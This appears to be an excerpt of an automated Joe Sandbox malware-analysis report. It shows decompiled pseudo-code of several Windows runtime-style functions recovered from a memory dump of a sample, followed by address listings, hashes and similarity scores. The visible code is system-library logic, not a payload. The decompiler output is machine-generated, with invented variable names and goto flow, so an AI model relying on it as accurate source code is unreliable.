						__eflags = _t88;
						_push(0);
						if(_t88 == 0) {
							L15:
							_t116 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t88 - 0x7fffffff;
							if(_t88 <= 0x7fffffff) {
								L16:
								 *(_t121 - 0x94) = _t116;
								__eflags = _t116;
								if(_t116 < 0) {
									__eflags = _t88;
									if(_t88 != 0) {
										 *_t106 = 0;
									}
									L26:
									 *(_t121 - 0xa0) = _t116;
									 *(_t121 - 4) = 0xfffffffe;
									__eflags = _t116;
									if(_t116 >= 0) {
										L31:
										_t101 = _t113;
										_t40 = _t101 + 1; // 0x1
										_t109 = _t40;
										do {
											_t69 =  *_t101;
											_t101 = _t101 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t102 = _t101 - _t109;
										__eflags = _t102;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t121 - 0x74)) = 0x40010006;
											 *(_t121 - 0x6c) =  *(_t121 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t121 - 0x64)) = 2;
											 *(_t121 - 0x70) =  *(_t121 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t121 - 0x60)) = (_t102 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t121 - 0x5c)) = _t113;
											 *(_t121 - 4) = 1;
											_push(_t121 - 0x74);
											E1D798A60(_t102, _t109);
											 *(_t121 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t121 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t121 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t121 + 8)));
										_push( *((intOrPtr*)(_t121 - 0x9c)));
										_push(_t102 & 0x0000ffff);
										_push(_t113);
										_push(1);
										_t104 = E1D7847C0();
										__eflags =  *((char*)(_t121 + 0x14)) - 1;
										if( *((char*)(_t121 + 0x14)) == 1) {
											__eflags = _t104 - 0x80000003;
											if(_t104 == 0x80000003) {
												E1D784CF0(1);
												_t104 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t121 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t121 - 0x78)) + 0xfca) & 0x0000fffd;
										_t67 = _t104;
										goto L4;
									}
									__eflags = _t116 - 0x80000005;
									if(_t116 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t121 - 0x90) = 0;
								 *((intOrPtr*)(_t121 - 0x7c)) = _t88 - 1;
								_t90 = E1D787810(_t106, _t88 - 1,  *((intOrPtr*)(_t121 - 0x8c)),  *((intOrPtr*)(_t121 - 0x88)));
								_t123 = _t123 + 0x10;
								_t107 = _t90;
								_t91 =  *((intOrPtr*)(_t121 - 0x7c));
								__eflags = _t107;
								if(_t107 < 0) {
									L21:
									_t116 = 0x80000005;
									 *(_t121 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t91 +  *((intOrPtr*)(_t121 - 0x80)))) = 0;
									L23:
									 *(_t121 - 0x94) = _t116;
									goto L26;
								}
								__eflags = _t107 - _t91;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t116;
					if(_t116 >= 0) {
						goto L31;
					}
					__eflags = _t116 - 0x80000005;
					if(_t116 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t96 + _t113 - 2)) = 0xa;
					_t39 = _t96 - 1; // -129
					_t102 = _t39;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t121 + 8)));
				_push(_t109);
				if(E1D783DC0() != 0) {
					goto L6;
				}
				goto L3;
			}


























                                                                                                                              0x1d73b931
                                                                                                                              0x1d73b931
                                                                                                                              0x1d73b936
                                                                                                                              0x1d73b93b
                                                                                                                              0x1d73b940
                                                                                                                              0x1d73b946
                                                                                                                              0x1d73b94f
                                                                                                                              0x1d73b958
                                                                                                                              0x1d73b964
                                                                                                                              0x1d73b96a
                                                                                                                              0x1d79cde2
                                                                                                                              0x1d79cde2
                                                                                                                              0x1d79cde5
                                                                                                                              0x1d79cdec
                                                                                                                              0x1d79cdee
                                                                                                                              0x1d73b991
                                                                                                                              0x1d73b991
                                                                                                                              0x1d73b993
                                                                                                                              0x1d73b99c
                                                                                                                              0x1d73b9a8
                                                                                                                              0x1d73b9a8
                                                                                                                              0x1d79cdf7
                                                                                                                              0x1d79cdfe
                                                                                                                              0x1d79ce00
                                                                                                                              0x1d79ce02
                                                                                                                              0x1d79ce02
                                                                                                                              0x1d79ce04
                                                                                                                              0x1d79ce04
                                                                                                                              0x1d79ce0a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d79ce15
                                                                                                                              0x1d79ce1a
                                                                                                                              0x1d79ce1d
                                                                                                                              0x1d79ce1f
                                                                                                                              0x1d79ce22
                                                                                                                              0x1d79ce22
                                                                                                                              0x1d79ce22
                                                                                                                              0x1d79ce26
                                                                                                                              0x1d79ce2c
                                                                                                                              0x1d79ce2e
                                                                                                                              0x1d79ce31
                                                                                                                              0x1d79ce31
                                                                                                                              0x1d79ce33
                                                                                                                              0x1d79ce34
                                                                                                                              0x1d79ce34
                                                                                                                              0x1d79ce38
                                                                                                                              0x1d79ce3a
                                                                                                                              0x1d79ce3a
                                                                                                                              0x1d79ce3d
                                                                                                                              0x1d79ce3f
                                                                                                                              0x1d79ce41
                                                                                                                              0x1d79ce41
                                                                                                                              0x1d79ce46
                                                                                                                              0x1d79ce4b
                                                                                                                              0x1d79ce4e
                                                                                                                              0x1d79ce51
                                                                                                                              0x1d79ce56
                                                                                                                              0x1d79ce56
                                                                                                                              0x1d79ce58
                                                                                                                              0x1d79ce5b
                                                                                                                              0x1d79ce64
                                                                                                                              0x1d79ce64
                                                                                                                              0x00000000
                                                                                                                              0x1d79ce5d
                                                                                                                              0x1d79ce5d
                                                                                                                              0x1d79ce62
                                                                                                                              0x1d79ce69
                                                                                                                              0x1d79ce69
                                                                                                                              0x1d79ce6f
                                                                                                                              0x1d79ce71
                                                                                                                              0x1d79cec0
                                                                                                                              0x1d79cec2
                                                                                                                              0x1d79cec4
                                                                                                                              0x1d79cec4
                                                                                                                              0x1d79cec7
                                                                                                                              0x1d79cec7
                                                                                                                              0x1d79cecd
                                                                                                                              0x1d79ced4
                                                                                                                              0x1d79ced6
                                                                                                                              0x1d79cf31
                                                                                                                              0x1d79cf31
                                                                                                                              0x1d79cf33
                                                                                                                              0x1d79cf33
                                                                                                                              0x1d79cf36
                                                                                                                              0x1d79cf36
                                                                                                                              0x1d79cf38
                                                                                                                              0x1d79cf39
                                                                                                                              0x1d79cf39
                                                                                                                              0x1d79cf3d
                                                                                                                              0x1d79cf3d
                                                                                                                              0x1d79cf3f
                                                                                                                              0x1d79cf3f
                                                                                                                              0x1d79cf45
                                                                                                                              0x1d79cf49
                                                                                                                              0x1d79cf9a
                                                                                                                              0x1d79cf9a
                                                                                                                              0x1d79cfa1
                                                                                                                              0x1d79cfa5
                                                                                                                              0x1d79cfac
                                                                                                                              0x1d79cfb4
                                                                                                                              0x1d79cfb7
                                                                                                                              0x1d79cfba
                                                                                                                              0x1d79cfc4
                                                                                                                              0x1d79cfc5
                                                                                                                              0x1d79cfd3
                                                                                                                              0x1d79cfe2
                                                                                                                              0x00000000
                                                                                                                              0x1d79cfe2
                                                                                                                              0x1d79cf52
                                                                                                                              0x1d79cf54
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d79cf56
                                                                                                                              0x1d79cf59
                                                                                                                              0x1d79cf62
                                                                                                                              0x1d79cf63
                                                                                                                              0x1d79cf64
                                                                                                                              0x1d79cf6b
                                                                                                                              0x1d79cf6d
                                                                                                                              0x1d79cf71
                                                                                                                              0x1d79cf73
                                                                                                                              0x1d79cf79
                                                                                                                              0x1d79cf7d
                                                                                                                              0x1d79cf82
                                                                                                                              0x1d79cf82
                                                                                                                              0x1d79cf82
                                                                                                                              0x1d79cf79
                                                                                                                              0x1d79cf8c
                                                                                                                              0x1d79cf93
                                                                                                                              0x00000000
                                                                                                                              0x1d79cf93
                                                                                                                              0x1d79ced8
                                                                                                                              0x1d79cede
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d79cede
                                                                                                                              0x1d79ce75
                                                                                                                              0x1d79ce7c
                                                                                                                              0x1d79ce8d
                                                                                                                              0x1d79ce92
                                                                                                                              0x1d79ce95
                                                                                                                              0x1d79ce97
                                                                                                                              0x1d79ce9a
                                                                                                                              0x1d79ce9c
                                                                                                                              0x1d79cea6
                                                                                                                              0x1d79cea6
                                                                                                                              0x1d79ceab
                                                                                                                              0x1d79ceb1
                                                                                                                              0x1d79ceb4
                                                                                                                              0x1d79ceb8
                                                                                                                              0x1d79ceb8
                                                                                                                              0x00000000
                                                                                                                              0x1d79ceb8
                                                                                                                              0x1d79ce9e
                                                                                                                              0x1d79cea0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d79cea2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d79cea4
                                                                                                                              0x00000000
                                                                                                                              0x1d79ce62
                                                                                                                              0x1d79ce5b
                                                                                                                              0x1d79cee4
                                                                                                                              0x1d79cee6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d79cee8
                                                                                                                              0x1d79ceee
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d79cef0
                                                                                                                              0x1d79cef7
                                                                                                                              0x1d79cef7
                                                                                                                              0x00000000
                                                                                                                              0x1d79cef7
                                                                                                                              0x1d73b97a
                                                                                                                              0x1d79cdd9
                                                                                                                              0x1d79cddc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d79cddc
                                                                                                                              0x1d73b980
                                                                                                                              0x1d73b980
                                                                                                                              0x1d73b983
                                                                                                                              0x1d73b98b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d50974aa93072932238d119081c959cfa20a323e79ab63d4012374ca67fcc923
                                                                                                                              • Instruction ID: 7027c03bbe89cc0716eb22d2d159b68db85414b9ae0d2da02a904120197eb571
                                                                                                                              • Opcode Fuzzy Hash: d50974aa93072932238d119081c959cfa20a323e79ab63d4012374ca67fcc923
                                                                                                                              • Instruction Fuzzy Hash: BD61E176D042599FDF29CF64D844BADBBB1FF04730F1141AED84AAB286D7314981CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D779ABF Relevance: .2, Instructions: 165COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 81%
                                                                                                                              			E1D779ABF(void* __ebx, signed int* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t79;
				intOrPtr _t81;
				intOrPtr _t84;
				intOrPtr* _t98;
				intOrPtr _t105;
				signed int* _t108;
				intOrPtr _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr _t120;
				char* _t122;
				char _t123;
				intOrPtr* _t129;
				intOrPtr _t131;
				intOrPtr _t133;
				intOrPtr _t134;
				void* _t135;

				_t127 = __edi;
				_t120 = __edx;
				_t108 = __ecx;
				_t106 = __ebx;
				_push(0x34);
				_push(0x1d81c978);
				E1D797BE4(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t135 - 0x2c)) = __edx;
				 *((intOrPtr*)(_t135 - 0x3c)) = __ecx;
				 *((intOrPtr*)(_t135 - 0x1c)) = 0xc0000001;
				_t131 =  *((intOrPtr*)(_t135 + 0x10));
				if(_t131 != 0) {
					_t79 =  *(_t131 + 0x1c);
				} else {
					_t79 = 0;
				}
				 *(_t135 - 0x24) = _t79;
				if(_t108 == 0 ||  *((intOrPtr*)(_t135 + 8)) == 0 || _t120 == 0 || (_t79 & 0xfffffffc) != 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					E1D814A6D(_t106, _t108, _t120, _t127, _t131);
					_t81 = 0xc000000d;
					goto L22;
				} else {
					 *_t108 =  *_t108 & 0x00000000;
					_t84 =  *0x1d836644; // 0x0
					_t88 = E1D755D90(_t108,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t84 + 0x00080000 | 0x00000008, 0xb8);
					 *((intOrPtr*)(_t135 - 0x30)) = _t88;
					_t129 = _t88;
					 *((intOrPtr*)(_t135 - 0x20)) = _t129;
					 *(_t135 - 4) =  *(_t135 - 4) & 0x00000000;
					 *((intOrPtr*)(_t135 - 0x38)) = 1;
					_t146 = _t129;
					if(_t129 == 0) {
						_t133 = 0xc0000017;
						 *((intOrPtr*)(_t135 - 0x1c)) = 0xc0000017;
						L19:
						 *(_t135 - 4) = 0xfffffffe;
						 *((intOrPtr*)(_t135 - 0x38)) = 0;
						E1D779CCF(_t88, _t129, _t133);
						if(_t133 >= 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_t135 - 0x3c)))) = _t129;
						}
						_t81 = _t133;
						L22:
						 *[fs:0x0] =  *((intOrPtr*)(_t135 - 0x10));
						return _t81;
					}
					_t129 =  *((intOrPtr*)(_t135 - 0x20));
					 *((intOrPtr*)(_t129 + 0x9c)) =  *((intOrPtr*)(_t135 + 4));
					 *((intOrPtr*)(_t135 - 0x28)) = _t129 + 0x30;
					_push(0x1d7113d0);
					_push( *(_t135 - 0x24));
					_push(_t131);
					_t133 = E1D744AB1(_t106, _t129 + 0x30,  *((intOrPtr*)(_t135 + 0xc)), _t129, _t131, _t146);
					 *((intOrPtr*)(_t135 - 0x1c)) = _t133;
					if(_t133 < 0) {
						goto L19;
					}
					 *(_t135 - 4) = 1;
					 *((intOrPtr*)(_t135 - 0x34)) = 1;
					 *((intOrPtr*)(_t129 + 0x60)) =  *((intOrPtr*)(_t135 + 8));
					 *(_t129 + 0xb4) = 0 |  *((intOrPtr*)(_t135 + 0x14)) != 0x00000000 |  *(_t129 + 0xb4) & 0xfffffffe;
					_t134 =  *((intOrPtr*)(_t135 - 0x2c));
					 *((intOrPtr*)(_t129 + 0xa8)) = _t134;
					_t115 =  *((intOrPtr*)(_t129 + 0x8c));
					 *((intOrPtr*)(_t129 + 0x20)) = E1D746E00;
					_t122 = _t129 + 0x28;
					if( *((intOrPtr*)(_t129 + 0x8c)) == 0) {
						 *(_t129 + 0x24) =  *(_t129 + 0x24) & 0x00000000;
						 *_t122 = 0;
						_t116 = 0;
						_t123 = 0;
					} else {
						E1D744A09(_t115, _t129 + 0x24, _t122);
						_t105 =  *((intOrPtr*)(_t135 - 0x30));
						_t116 =  *((intOrPtr*)(_t105 + 0x24));
						_t123 =  *((intOrPtr*)(_t105 + 0x28));
					}
					 *(_t129 + 0x14) =  *(_t129 + 0x14) & 0x00000000;
					_t98 = _t129 + 0x18;
					 *((intOrPtr*)(_t98 + 4)) = _t98;
					 *_t98 = _t98;
					 *_t129 = 0x1d711088;
					 *((intOrPtr*)(_t129 + 4)) = _t116;
					 *((char*)(_t129 + 8)) = _t123;
					_t117 =  *((intOrPtr*)(_t129 + 0x8c));
					 *((intOrPtr*)(_t135 - 0x30)) = _t117;
					if(_t117 == 0) {
						L28:
						_t99 = E1D814A6D(_t106, _t117, _t123, _t129, _t134);
						_t133 = 0xc000000d;
						goto L15;
					} else {
						if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
							_t129 =  *((intOrPtr*)(_t135 - 0x20));
							goto L28;
						} else {
							 *((intOrPtr*)(_t135 - 0x40)) =  *((intOrPtr*)(_t117 + 0x28));
							_t129 =  *((intOrPtr*)(_t135 - 0x20));
							 *((intOrPtr*)(_t135 - 0x44)) = _t129;
							_push(8);
							_push(_t135 - 0x44);
							_push(2);
							_push(_t134);
							_t133 = E1D783280();
							if(_t133 >= 0) {
								_t99 = E1D74491F( *((intOrPtr*)(_t135 - 0x30)), 1);
								_t133 = 0;
							}
							L15:
							 *((intOrPtr*)(_t135 - 0x1c)) = _t133;
							if(_t133 >= 0) {
								_t133 = 0;
								 *((intOrPtr*)(_t135 - 0x1c)) = 0;
								_t99 =  *((intOrPtr*)(_t135 + 0x10));
								_t118 =  *((intOrPtr*)(_t135 - 0x28));
								if(_t99 != 0) {
									 *((intOrPtr*)(_t118 + 0x10)) = _t99;
								}
								if( *((intOrPtr*)(_t118 + 8)) != _t133) {
									_t99 = E1D7773B3(_t106, _t118, _t129, _t133, __eflags);
								}
							}
							 *(_t135 - 4) =  *(_t135 - 4) & 0x00000000;
							 *((intOrPtr*)(_t135 - 0x34)) = 0;
							_t88 = E1D779CC4(_t99, _t129, _t133);
							goto L19;
						}
					}
				}
			}




















                                                                                                                              0x1d779abf
                                                                                                                              0x1d779abf
                                                                                                                              0x1d779abf
                                                                                                                              0x1d779abf
                                                                                                                              0x1d779abf
                                                                                                                              0x1d779ac1
                                                                                                                              0x1d779ac6
                                                                                                                              0x1d779acb
                                                                                                                              0x1d779ace
                                                                                                                              0x1d779ad1
                                                                                                                              0x1d779ad8
                                                                                                                              0x1d779add
                                                                                                                              0x1d779cb4
                                                                                                                              0x1d779ae3
                                                                                                                              0x1d779ae3
                                                                                                                              0x1d779ae3
                                                                                                                              0x1d779ae5
                                                                                                                              0x1d779aea
                                                                                                                              0x1d7b6009
                                                                                                                              0x1d7b600e
                                                                                                                              0x00000000
                                                                                                                              0x1d779b20
                                                                                                                              0x1d779b20
                                                                                                                              0x1d779b23
                                                                                                                              0x1d779b3f
                                                                                                                              0x1d779b44
                                                                                                                              0x1d779b47
                                                                                                                              0x1d779b49
                                                                                                                              0x1d779b4c
                                                                                                                              0x1d779b50
                                                                                                                              0x1d779b57
                                                                                                                              0x1d779b59
                                                                                                                              0x1d7b5f8e
                                                                                                                              0x1d7b5f93
                                                                                                                              0x1d779c84
                                                                                                                              0x1d779c84
                                                                                                                              0x1d779c8b
                                                                                                                              0x1d779c92
                                                                                                                              0x1d779c99
                                                                                                                              0x1d779c9e
                                                                                                                              0x1d779c9e
                                                                                                                              0x1d779ca0
                                                                                                                              0x1d779ca2
                                                                                                                              0x1d779ca5
                                                                                                                              0x1d779cb1
                                                                                                                              0x1d779cb1
                                                                                                                              0x1d779b62
                                                                                                                              0x1d779b65
                                                                                                                              0x1d779b6e
                                                                                                                              0x1d779b71
                                                                                                                              0x1d779b76
                                                                                                                              0x1d779b79
                                                                                                                              0x1d779b84
                                                                                                                              0x1d779b86
                                                                                                                              0x1d779b8b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d779b94
                                                                                                                              0x1d779b97
                                                                                                                              0x1d779b9d
                                                                                                                              0x1d779bb3
                                                                                                                              0x1d779bb9
                                                                                                                              0x1d779bbc
                                                                                                                              0x1d779bc2
                                                                                                                              0x1d779bc8
                                                                                                                              0x1d779bcf
                                                                                                                              0x1d779bd4
                                                                                                                              0x1d7b5f9b
                                                                                                                              0x1d7b5f9f
                                                                                                                              0x1d7b5fa2
                                                                                                                              0x1d7b5fa4
                                                                                                                              0x1d779bda
                                                                                                                              0x1d779bde
                                                                                                                              0x1d779be3
                                                                                                                              0x1d779be6
                                                                                                                              0x1d779be9
                                                                                                                              0x1d779be9
                                                                                                                              0x1d779bec
                                                                                                                              0x1d779bf0
                                                                                                                              0x1d779bf3
                                                                                                                              0x1d779bf6
                                                                                                                              0x1d779bf8
                                                                                                                              0x1d779bfe
                                                                                                                              0x1d779c01
                                                                                                                              0x1d779c04
                                                                                                                              0x1d779c0a
                                                                                                                              0x1d779c0f
                                                                                                                              0x1d7b5fae
                                                                                                                              0x1d7b5fae
                                                                                                                              0x1d7b5fb3
                                                                                                                              0x00000000
                                                                                                                              0x1d779c15
                                                                                                                              0x1d779c22
                                                                                                                              0x1d7b5fab
                                                                                                                              0x00000000
                                                                                                                              0x1d779c28
                                                                                                                              0x1d779c2b
                                                                                                                              0x1d779c2e
                                                                                                                              0x1d779c31
                                                                                                                              0x1d779c34
                                                                                                                              0x1d779c39
                                                                                                                              0x1d779c3a
                                                                                                                              0x1d779c3c
                                                                                                                              0x1d779c42
                                                                                                                              0x1d779c46
                                                                                                                              0x1d779c4e
                                                                                                                              0x1d779c53
                                                                                                                              0x1d779c53
                                                                                                                              0x1d779c55
                                                                                                                              0x1d779c55
                                                                                                                              0x1d779c5a
                                                                                                                              0x1d779c5c
                                                                                                                              0x1d779c5e
                                                                                                                              0x1d779c61
                                                                                                                              0x1d779c64
                                                                                                                              0x1d779c69
                                                                                                                              0x1d779cbf
                                                                                                                              0x1d779cbf
                                                                                                                              0x1d779c6e
                                                                                                                              0x1d7b5fbd
                                                                                                                              0x1d7b5fbd
                                                                                                                              0x1d779c6e
                                                                                                                              0x1d779c74
                                                                                                                              0x1d779c78
                                                                                                                              0x1d779c7f
                                                                                                                              0x00000000
                                                                                                                              0x1d779c7f
                                                                                                                              0x1d779c22
                                                                                                                              0x1d779c0f

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ecbb1861ee1e639580bd511c546029cf44652af14853ef0405332493d392cf42
                                                                                                                              • Instruction ID: f01fa7d6803d524ff0e034a9cacaf1efba97447a8115e31dcb4b38330c8bcdd3
                                                                                                                              • Opcode Fuzzy Hash: ecbb1861ee1e639580bd511c546029cf44652af14853ef0405332493d392cf42
                                                                                                                              • Instruction Fuzzy Hash: 51619875E06659DFDF05CF68D484BADBBF0BF48720F11862AE909AB750D374A900CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7477F9 Relevance: .2, Instructions: 164COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 75%
                                                                                                                              			E1D7477F9(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t63;
				signed int _t65;
				intOrPtr _t66;
				char* _t71;
				intOrPtr _t75;
				intOrPtr _t76;
				signed int _t80;
				intOrPtr _t81;
				void* _t85;
				char _t86;
				intOrPtr* _t87;
				intOrPtr _t89;
				void* _t95;
				intOrPtr _t98;
				void* _t100;
				void* _t105;
				signed int _t106;
				intOrPtr* _t110;
				void* _t111;
				intOrPtr* _t112;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t115;
				signed int _t116;
				void* _t128;

				_t118 = (_t116 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1d83b370 ^ (_t116 & 0xfffffff8) - 0x0000004c;
				_t110 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t103 = __ecx[3];
				if(_t103 == 0) {
					_t58 =  *__ecx | __ecx[1];
					if(( *__ecx | __ecx[1]) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E1D753C40() != 0) {
							_t63 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t63 = 0x7ffe0386;
						}
						if( *_t63 != 0) {
							E1D814EC1(_t110);
						}
						_push(0);
						_push( *((intOrPtr*)(_t110 + 0x10)));
						_t58 = E1D7832F0();
					}
					L20:
					_pop(_t105);
					_pop(_t111);
					_pop(_t85);
					return E1D784B50(_t58, _t85, _v8 ^ _t118, _t103, _t105, _t111);
				}
				_t65 = __ecx[2];
				_t86 =  *((intOrPtr*)(_t65 + 0x10));
				_t95 =  *((intOrPtr*)(_t103 + 0x10)) - _t86;
				_t106 =  *(_t65 + 0x14);
				_t66 =  *((intOrPtr*)(_t103 + 0x14));
				_t103 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t86;
				_v52 = _t106;
				_t58 = E1D786310(_t95, _t66, 0x2710, 0);
				_v56 = _t58;
				if( *_t110 != _t86 ||  *(_t110 + 4) != _t106) {
					L3:
					 *(_t110 + 0x44) = _t58;
					_t103 = _t58 * 0x2710 >> 0x20;
					 *_t110 = _t86;
					 *(_t110 + 4) = _t106;
					_v20 = _t58 * 0x2710;
					_v16 = _t58 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t86;
						_v32 = _t106;
						if(E1D753C40() != 0) {
							_t71 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t71 = 0x7ffe0386;
						}
						if( *_t71 != 0) {
							_t103 = _v40;
							E1D815149(_t110, _v40, _t86, _t106);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_push( *((intOrPtr*)(_t110 + 0x10)));
						_t58 = E1D784490();
						goto L20;
					} else {
						_t87 = 0x7ffe03b0;
						do {
							_t112 = 0x7ffe0010;
							do {
								_t75 =  *0x1d8367f0; // 0x0
								_v68 = _t75;
								_t76 =  *0x1d8367f4; // 0x0
								_v64 = _t76;
								_v72 =  *_t87;
								_v76 =  *((intOrPtr*)(_t87 + 4));
								while(1) {
									_t103 =  *0x7ffe000c;
									_t98 =  *0x7ffe0008;
									if(_t103 ==  *_t112) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t87 = 0x7ffe03b0;
								_t113 =  *0x7ffe03b0;
								_t80 =  *0x7FFE03B4;
								_v60 = _t113;
								_t112 = 0x7ffe0010;
								_v56 = _t80;
							} while (_v72 != _t113 || _v76 != _t80);
							_t81 =  *0x1d8367f0; // 0x0
							_t114 =  *0x1d8367f4; // 0x0
							_v76 = _t114;
							_t115 = _v68;
						} while (_t115 != _t81 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t100 = _t98 - _v60 - _t115;
						_t110 = _v48;
						_t89 = _v44;
						asm("sbb edx, eax");
						_t128 = _t103 - _v52;
						if(_t128 < 0 || _t128 <= 0 && _t100 <= _t89) {
							_t86 = _t100 - _t89;
							asm("sbb edx, edi");
							_t106 = _t103;
						} else {
							_t86 = 0;
							_t106 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t110 + 0x44) == _t58) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                                                              0x1d747801
                                                                                                                              0x1d74780b
                                                                                                                              0x1d747811
                                                                                                                              0x1d747813
                                                                                                                              0x1d747819
                                                                                                                              0x1d74781e
                                                                                                                              0x1d747822
                                                                                                                              0x1d747827
                                                                                                                              0x1d747996
                                                                                                                              0x1d747999
                                                                                                                              0x1d74799b
                                                                                                                              0x1d74799d
                                                                                                                              0x1d7479a7
                                                                                                                              0x1d7a1795
                                                                                                                              0x1d7479ad
                                                                                                                              0x1d7479ad
                                                                                                                              0x1d7479ad
                                                                                                                              0x1d7479b4
                                                                                                                              0x1d7479c3
                                                                                                                              0x1d7479c3
                                                                                                                              0x1d7479b6
                                                                                                                              0x1d7479b7
                                                                                                                              0x1d7479ba
                                                                                                                              0x1d7479ba
                                                                                                                              0x1d747978
                                                                                                                              0x1d74797c
                                                                                                                              0x1d74797d
                                                                                                                              0x1d74797e
                                                                                                                              0x1d747989
                                                                                                                              0x1d747989
                                                                                                                              0x1d74782d
                                                                                                                              0x1d747835
                                                                                                                              0x1d747838
                                                                                                                              0x1d74783a
                                                                                                                              0x1d74783d
                                                                                                                              0x1d747840
                                                                                                                              0x1d747846
                                                                                                                              0x1d747848
                                                                                                                              0x1d74784e
                                                                                                                              0x1d747852
                                                                                                                              0x1d747857
                                                                                                                              0x1d74785d
                                                                                                                              0x1d747868
                                                                                                                              0x1d74786d
                                                                                                                              0x1d747870
                                                                                                                              0x1d747877
                                                                                                                              0x1d747879
                                                                                                                              0x1d74787c
                                                                                                                              0x1d747880
                                                                                                                              0x1d747884
                                                                                                                              0x1d747941
                                                                                                                              0x1d747941
                                                                                                                              0x1d747945
                                                                                                                              0x1d747950
                                                                                                                              0x1d7a17b1
                                                                                                                              0x1d747956
                                                                                                                              0x1d747956
